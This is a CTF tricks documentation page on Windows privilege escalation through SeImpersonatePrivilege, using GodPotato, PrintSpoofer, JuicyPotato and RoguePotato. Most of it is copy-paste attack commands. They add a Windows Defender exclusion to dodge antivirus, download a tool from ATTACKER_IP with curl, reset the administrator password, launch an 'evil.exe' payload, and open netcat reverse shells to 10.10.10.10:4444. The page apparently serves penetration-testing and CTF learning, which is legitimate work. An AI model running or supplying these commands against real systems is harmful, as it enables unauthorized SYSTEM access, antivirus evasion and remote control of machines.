> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/windows/getsystem/privilege-escalation-windows-impersonation.md).

# Impersonation

## GodPotato PE Via SeImpersonate and AV Exclusion

Leverage a Windows Defender exclusion path to bypass AV detection for privilege escalation tools like GodPotato.

Identifying exclusion paths is the first step. Tools like `PrivescCheck.ps1` can find these paths (e.g., `C:\xampp` found by `PrivescCheck.ps1` in this case).

```powershell
powershell -ep bypass -c ". .\PrivescCheck.psl; Invoke-PrivescCheck -Extended"
```

Another method to identify paths ignored by Windows Defender is to directly query the system's configuration. Paths configured as exclusions will not be scanned. The `Get-MpPreference` cmdlet can be used for this. Using the `-ExpandProperty` parameter ensures that the full list of paths is displayed without truncation.

```powershell
Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
```

This command lists the specific directories that Windows Defender is configured to ignore. Windows Defender also stores its exclusions in the registry under `HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths`.

If no suitable exclusion path is found, or if a specific location is desired for the exploit, a new exclusion can be added using the `Add-MpPreference` cmdlet. This command adds a path to the exclusion list, preventing real-time and scheduled scans of that directory.

```powershell
Add-MpPreference -ExclusionPath "C:\temp"
```

This command adds the `C:\temp` folder to the exclusion list. Multiple paths can be added by providing an array of strings to the `-ExclusionPath` parameter.

Once an exclusion path is identified or created, upload the exploit tool to that location.

```bash
curl http://ATTACKER_IP/GodPotato-NET4.exe -o C:\xampp\GodPotato-NET4.exe
```

Finally, execute the tool directly from the full path within the excluded directory to benefit from the bypass.

```powershell
C:\xampp\GodPotato-NET4.exe -cmd "cmd /c net user administrator NewPassword123"
```

Other command execution examples include checking privileges:

```powershell
C:\xampp\GodPotato-NET4.exe -cmd "whoami /priv"
```

This method enables tools like GodPotato (exploiting `SeImpersonatePrivilege`) to run and gain SYSTEM privileges without being blocked by antivirus, provided they are executed from a path explicitly excluded from scanning.

***

## Privilege Escalation via SeImpersonate and Print Spooler

Check if the current user holds the `SeImpersonate` or `SeAssignPrimaryToken` privilege using:

```bash
whoami /priv
```

If either privilege is listed as `Enabled`, you can likely exploit the Print Spooler service vulnerability to elevate privileges to `SYSTEM`. This vulnerability allows a user with `SeImpersonate` or `SeAssignPrimaryToken` privileges to impersonate arbitrary users, including `SYSTEM`.

Utilize a tool like `PrintSpoofer`, `JuicyPotato`, or `RottenPotatoNG` (depending on the target Windows version and architecture) that exploits this vulnerability. These tools leverage the impersonation capabilities granted by the necessary privileges. `RoguePotato` is another tool that can be used for this purpose, often effective on systems where `JuicyPotato` or `RottenPotatoNG` might fail due to DCOM activation issues.

Execute the tool, providing a command to be run with elevated privileges (typically `SYSTEM`).

For example, using `PrintSpoofer.exe`:

```bash
PrintSpoofer.exe -i -c "C:\Windows\System32\cmd.exe /c whoami > C:\Users\Public\whoami_system.txt"
```

This command tells `PrintSpoofer` (`-i` for interactive/system session) to execute the specified command (`-c`) as `SYSTEM`. The example command runs `whoami` and saves the output to a file, confirming the elevated context.

Other ways to use `PrintSpoofer` include executing a command prompt or a PowerShell session directly as `SYSTEM`:

```bash
PrintSpoofer.exe -i -c cmd
```

```bash
PrintSpoofer.exe -i -c powershell
```

You can also execute a custom binary using the `-c` parameter:

```bash
PrintSpoofer.exe -i -c "C:\Windows\System32\cmd.exe /c C:\temp\evil.exe"
```

The tool can also be used to impersonate a specific process ID (PID) using the `-p` parameter:

```bash
PrintSpoofer.exe -p <PID> -c cmd
```

For tools like `JuicyPotato`, `RottenPotatoNG`, or `RoguePotato`, the command syntax will differ, often involving specifying the target CLSID, COM listener port, and the command to execute, potentially requiring a listener set up to catch the elevated shell.

`JuicyPotato` parameters often include:

* `-l <port>`: COM listen port
* `-p <program path>`: Program to execute
* `-a <program args>`: Arguments for the program
* `-t <createprocess | creatprocesswithtoken>`: Creation mode (`*` for both)
* `-c <clsid>`: CLSID
* `-z`: Show CLSID list

For instance, a basic `JuicyPotato` command might look like:

```bash
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\temp\nc.exe 10.10.10.10 4444 -e cmd.exe" -t *
```

This example attempts to trigger a connection back to a specified IP and port (10.10.10.10:4444) using netcat (`nc.exe`), executing a command prompt (`cmd.exe`) within the elevated context. The `-l` parameter sets the COM listener port, `-p` specifies the program to execute, `-a` provides arguments for that program, and `-t *` attempts all available COM servers.

You can also specify a particular CLSID to use:

```bash
JuicyPotato.exe -l 1337 -c {9B1F122C-2982-4e91-AA8B-E07128FD8CF7} -p C:\Windows\System32\cmd.exe -a "whoami" -t *
```

When using `RoguePotato`, the command might involve specifying a listening address and port for the server component and the target CLSID. Parameters include:

* `-r <remote_ip>`: Rogue server IP
* `-p <remote_port>`: Rogue server port
* `-l <listen_port>`: COM listen port
* `-c <clsid>`: CLSID
* `-e <command>`: Command to execute

An example command:

```bash
RoguePotato.exe -r 10.10.10.10 -p 9999 -l 1337 -c "{CLSID}" -e "C:\temp\nc.exe 10.10.10.10 4444 -e cmd.exe"
```

Here, `-r` is the address for the server, `-p` is the server port, `-l` is the COM listener port, `-c` is the target CLSID, and `-e` is the command to execute. A simpler example executing `whoami` locally:

```bash
RoguePotato.exe -r 127.0.0.1 -p 9999 -l 1337 -c {CLSID} -e "C:\Windows\System32\cmd.exe /c whoami"
```

The specific CLSID and other parameters may need to be adjusted based on the target system configuration and available COM objects.
